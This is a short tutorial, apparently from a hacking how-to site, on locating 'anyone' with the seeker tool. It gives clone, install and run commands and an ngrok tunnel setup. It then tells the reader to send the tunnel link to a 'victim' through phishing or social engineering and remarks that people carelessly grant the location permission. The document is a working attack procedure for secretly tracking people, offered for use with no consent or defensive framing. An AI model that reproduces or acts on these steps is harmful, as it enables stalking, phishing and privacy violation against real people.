In this tutorial, we will show you how to get anyone’s location using tool seeker, so without further do let’s start.
Step 1. To begin, download seeker Tool from here.
How To Install:
Ubuntu/Debian/Kali/Parrot –
#git clone https://github.com/thewhiteh4t/seeker.git
#cd seeker/
#apt update
#apt install python3 python3-pip php
#pip3 install requests
Blackarch Linux –
#pacman -S seeker
After installing Completed go to down…
Step 2. After that, you need to install Setup ngrok for server.
Navigate to https://ngrok.com/ and Signup.
After You will Get This Page So Download ngrok According to Your OS
After Do Unzip downloaded File.
Now you need to add AuthToken in our ngrok Configuration, so you will see second option which is show your token.
$ ./ngrok authtoken <Your AuthToken>
Now you done all configuration.
Step 3. Navigate to Seeker directory.
If seeker.py file doesn’t have execute permission then set using Below cmd
# chmod +x seeker.py
Then run the following command:
#./seeker.py -t manual
After Server will start, choose [0] .
Step 4. Navigate to Directory where ngrok is unzipped and run below command:
./ngrok http 8080
Copy forwarding Link and send to Victim using Phishing or any Social engineering solutions.
Eg. https://e078-49-34-114-151.ngrok.io
Step 5. When we are in Victim Side, click on the link then it will look like this:
When Victim click on Continue, webpage take Permission so Allow it
Note : Mostly People Don’t Notice What is Permission and people Easily allow it
Step 6. Now Coming Back To Hacker’s Terminal(seeker’s)
You will Get Many Information About Victim but we need only Google Maps links so copy link and ppen it on Browser.